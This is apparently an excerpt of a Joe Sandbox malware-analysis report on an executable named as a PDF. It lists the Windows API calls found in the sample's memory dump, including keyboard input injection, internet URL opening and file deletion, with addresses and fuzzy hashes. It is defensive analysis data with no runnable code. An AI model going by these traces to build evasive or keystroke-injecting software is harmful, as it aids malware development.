                                                    • Opcode Fuzzy Hash: a50b67f14435d20545fb30f495ea7534014c6536e26bbd3a72e56a4354ebf78e
                                                    • Instruction Fuzzy Hash: 0BE01271804E1CEBCB139750CD05DFAB7BCA704745F5444E2FA06E1C14E7359B84AB22
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003A21FB,?,003A23EF), ref: 003A2213
                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003A2225
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetProcessId$kernel32.dll
                                                    • API String ID: 2574300362-399901964
                                                    • Opcode ID: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                                    • Instruction ID: 377c5f184875f753e64b17819e7f2d7697bc913a206f8621e04dd9665516bf9e
                                                    • Opcode Fuzzy Hash: b60ff05bbdae7157f588f85563fbdb6d0bd629c961b7bcfa253712c1413c84f8
                                                    • Instruction Fuzzy Hash: ADD0A73480071A9FD7675F34FC08B5376DCEB06300F154829F846E2150D770E8808750
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003442EC,?,003442AA,?), ref: 00344304
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344316
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                                    • Instruction ID: 14f69b9f9b13018155dce60b926ab641e6817146d80015be1c36d42ca7e929e2
                                                    • Opcode Fuzzy Hash: 21caaa99a20e514e9a701526505d32105f8ca43fbb8a98cf9855baf8cd802f72
                                                    • Instruction Fuzzy Hash: 05D0A7348047129FC7634F20EC0CB5276D8AB14701F154439F542D2160D7B0E8808710
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,003441BB,00344341,?,0034422F,?,003441BB,?,?,?,?,003439FE,?,00000001), ref: 00344359
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0034436B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                                    • Instruction ID: 6c304e0e45ed581fdb2e277abb8e2a8acb9fe05437ce20bc6d21e3e261f51785
                                                    • Opcode Fuzzy Hash: 01ed62f9c60a0fd28b8d28af5e824d729c93322d5b2ac44f80e197e0b0e9cf85
                                                    • Instruction Fuzzy Hash: 83D0A934800712AFC7234F30EC09B9276E8AB20B15F16C43AF882D2290EBB0F8808B10
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0038051D,?,003805FE), ref: 00380547
                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00380559
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1071820185
                                                    • Opcode ID: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                                    • Instruction ID: 15b9f70c088b1dbe07bf9243fbf402afbe20a113cf51d6d499c0fbe068d9457f
                                                    • Opcode Fuzzy Hash: 8b6e4378581748d39e9d5935e6d25d269a739969a6b6ec015b2fea6af1779638
                                                    • Instruction Fuzzy Hash: 8BD0A730414712DFC7629F21EC08A5677E8AB01301F15C46DF457D2250D670D8848B20
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0038052F,?,003806D7), ref: 00380572
                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00380584
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                    • API String ID: 2574300362-1587604923
                                                    • Opcode ID: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                                    • Instruction ID: 3271dc7b7e470bd90fb4d8384e53ece4c29d05a25879ddef1cac95945874962f
                                                    • Opcode Fuzzy Hash: da4141c971c40b97ec2569e2a409006f536116bf36804fe10128fe24090aeacb
                                                    • Instruction Fuzzy Hash: 49D05E304147169EC7626F20A848A5377E8AB05300F158469F942D2654D670D4848B20
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0039ECBE,?,0039EBBB), ref: 0039ECD6
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0039ECE8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                                    • Instruction ID: 0b199319a1db2fd5b49b0b7a142205c7b85b3c694367f345f3a36bd2db34ebed
                                                    • Opcode Fuzzy Hash: 62aa44e2be6defbb887124ec997996426d352fcce35c72e55aac819dee11cd36
                                                    • Instruction Fuzzy Hash: CDD0A7308007239FCF239F61EC48A5376E8AB00300F158829F886D2150DB70D8808B10
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0039BAD3,00000001,0039B6EE,?,003DDC00), ref: 0039BAEB
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0039BAFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                                    • Instruction ID: e4432852f016f0459d2772ff6f3b745ee8266f024fe34b29598d2b7de5bfeb6e
                                                    • Opcode Fuzzy Hash: 41e2f2c9f92fa8b1f8516691fd4b574adb3d30d908ce0e24a929b30f47ad135f
                                                    • Instruction Fuzzy Hash: 3FD05E308047129FCB325F20B848A62B6D8AB00300F154429E943D2294DB70D880C710
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,003A3BD1,?,003A3E06), ref: 003A3BE9
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003A3BFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: d9aeb69571b41c80161e0c27d8db624345cc18b98f46b4d378a2f43dee40b707
                                                    • Instruction ID: 49e85fc247e58c8b241aaa922c4848b87589f87ff4ef3096afbcd92e1997dfc4
                                                    • Instruction Fuzzy Hash: 00D0A7705007169FC7225F60EC09A93BAF8EB03324F154429F446E2150D6B0D4808F10
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43cb1b24387e82cc51b871a9fecb92628409725c946f793359169eba2e8301dc
                                                    • Instruction ID: fd3d77edfc775469d0c2ebfa93aaceacd1d848d2db7fb93f6a9ebc3a6e415d03
                                                    • Instruction Fuzzy Hash: 51C15E75A00216EFDB26CF94C884BAEB7B5FF48700F118699E909AB251D734DE41DB90
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0039AAB4
                                                    • CoUninitialize.OLE32 ref: 0039AABF
                                                      • Part of subcall function 00380213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0038027B
                                                    • VariantInit.OLEAUT32(?), ref: 0039AACA
                                                    • VariantClear.OLEAUT32(?), ref: 0039AD9D
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                                    • Instruction ID: 339ad5db0db9b953a462aacbf78acb55809a8b609ee3fa3e57c1f59d0b3efb2a
                                                    • Instruction Fuzzy Hash: FCA11775204B019FCB12EF14C491B1AB7E5BF89710F154959FA969B3A2CB30FD44CB86
                                                    APIs
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                                    • Instruction ID: 4a570ee69782b057961b2c55c23706b030bc818a1af9cf0de45cd87d133fd1dc
                                                    • Instruction Fuzzy Hash: 42518334604706DBEB36AF669491B2AB3E9EF45310F20C91FE54ECB6E1DB7898408701
                                                    APIs
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3877424927-0
                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                    • Instruction ID: 32a641b85f242b71eb6f3d61dd9a13891fec1dc133d2cd4f4cc74a5dbc0e00d3
                                                    • Instruction Fuzzy Hash: 6B51C7B0A00305ABDB268F69C8856AE7BB5EF40320F25C72DF835976D8D7719F548B50
                                                    APIs
                                                    • GetWindowRect.USER32(00C76F78,?), ref: 003AC544
                                                    • ScreenToClient.USER32(?,00000002), ref: 003AC574
                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003AC5DA
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                                    • Instruction ID: ae7704ff4e610db82a3968491d15c67685d99661c08a5059cfcc72c9a6aa7cdb
                                                    • Instruction Fuzzy Hash: 8A517E75910208EFCF12DF68C980AAE7BB5FF56320F159669F8659B2A0D730ED41CB90
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0037C462
                                                    • __itow.LIBCMT ref: 0037C49C
                                                      • Part of subcall function 0037C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0037C753
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0037C505
                                                    • __itow.LIBCMT ref: 0037C55A
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 669d506c3132d50351f5a66eb57ab682d6a48739b45a81e9c68c01811ba85304
                                                    • Instruction ID: 255e7794ac7b25863b6ae40bf7ea21bd0f56e8b6f717e3212fdbd06700b92351
                                                    • Instruction Fuzzy Hash: 6641A671A00208AFDF23DF55C851FEE7BB9AF49710F005019FA09AB192DB75AA45CB91
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00383966
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00383982
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003839EF
                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00383A4D
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                                    • Instruction ID: a457334c801127a980f3d3c8ef0624527be43fd4a298193a39f596ceb2089a20
                                                    • Instruction Fuzzy Hash: 35411870A04348AEEF37AB64C805BFEBBB9AB55710F04019AF4C1963C1C7B89E85D765
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038E742
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0038E768
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038E78D
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038E7B9
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                                    • Instruction ID: 2ff098c2a796eee4ca73aa37b4c36312a3d35776551f50e8bec26eef5fec9659
                                                    • Instruction Fuzzy Hash: 494102396006109FCB12AF55C444A4EBBE5BF9A720B198499F946AF3B2CB74FD008B91
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003AB5D1
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                                    • Instruction ID: f32c62ff7b14702936334e142a8a837137ffb0584581416bc67c9f5d20c38a3d
                                                    • Instruction Fuzzy Hash: 3131E034A00204BFEF268F18CC89FA8BB68EB07350F554611FA51E65F3C734A9508B51
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 003AD807
                                                    • GetWindowRect.USER32(?,?), ref: 003AD87D
                                                    • PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                                    • MessageBeep.USER32(00000000), ref: 003AD8FE
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                                    • Instruction ID: afec7bab69813dc1888a5163318aca7911a751a74dad17672e2630f3772166d6
                                                    • Instruction Fuzzy Hash: A3418970A00218DFCB12DF58D884BA9BBF9FF4A311F1981A9E816DF660D739E941CB40
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00383AB8
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00383AD4
                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00383B34
                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00383B92
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                                    • Instruction ID: 58d410d1e4e4de7fe155e829d406c92d0e27cc837bfcfed8a480d8010d1d7753
                                                    • Instruction Fuzzy Hash: 5E3144B0A04348AEEF23AB64C819BFEBBAA9F45710F05019AE481973D1C7749F45C765
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00374038
                                                    • __isleadbyte_l.LIBCMT ref: 00374066
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00374094
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003740CA
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 5d95adcd3ad4e1aa627942444058f17e0e0fa63fa6ba410560c48279f9a9b949
                                                    • Instruction ID: b3a3c989ea5b68f33b627af0a225b4196c5cf56a8895dafd827e478d4d1e38d3
                                                    • Opcode Fuzzy Hash: 5d95adcd3ad4e1aa627942444058f17e0e0fa63fa6ba410560c48279f9a9b949
                                                    • Instruction Fuzzy Hash: 7F31B231600216AFDB339F74C845B7ABBA9BF40310F16C428E6698B190E735E890DB90
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 003A7CB9
                                                      • Part of subcall function 00385F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00385F6F
                                                      • Part of subcall function 00385F55: GetCurrentThreadId.KERNEL32 ref: 00385F76
                                                      • Part of subcall function 00385F55: AttachThreadInput.USER32(00000000,?,0038781F), ref: 00385F7D
                                                    • GetCaretPos.USER32(?), ref: 003A7CCA
                                                    • ClientToScreen.USER32(00000000,?), ref: 003A7D03
                                                    • GetForegroundWindow.USER32 ref: 003A7D09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                                    • Instruction ID: 78e49cc4643def858039ca1dd4bfb63128408b1c039cb26ed58e75e8f18e5ed4
                                                    • Opcode Fuzzy Hash: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                                    • Instruction Fuzzy Hash: 8C311E71900108AFDB01EFA9CC85DEFBBFDEF55314B118466F915E7221DA319E058BA0
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetCursorPos.USER32(?), ref: 003AF211
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003BE4C0,?,?,?,?,?), ref: 003AF226
                                                    • GetCursorPos.USER32(?), ref: 003AF270
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003BE4C0,?,?,?), ref: 003AF2A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                                    • Instruction ID: a2dcfe44b0f796414d48b1e1fe28469362e19f7c3dc0cb7912966ba1525c5c64
                                                    • Opcode Fuzzy Hash: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                                    • Instruction Fuzzy Hash: A021803D500018AFCB169F94CC98EFA7BB9EF4A710F058869F9099B2A1D3319951DB50
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00394358
                                                      • Part of subcall function 003943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                                      • Part of subcall function 003943E2: InternetCloseHandle.WININET(00000000), ref: 0039449E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                                    • Instruction ID: 7cb79759bf4b9686747e53ff8a06b8daddb32e7581e94d8bc6a02c4ccb94307e
                                                    • Opcode Fuzzy Hash: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                                    • Instruction Fuzzy Hash: 5321A17A200605BBEF179F709C40FBBB7ADFF44711F14401ABA15D6A50DB71A8329B90
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A8AA6
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8AC0
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8ACE
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003A8ADC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                                    • Instruction ID: 6af0b40dfa29a87de327b954c614048cb55a367598234e198d102dacf245311b
                                                    • Opcode Fuzzy Hash: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                                    • Instruction Fuzzy Hash: EA118E31205511AFD706AB18CC05FBA779DEF86321F144519F916DB2E2CFB0BD118794
                                                    APIs
                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00398AE0
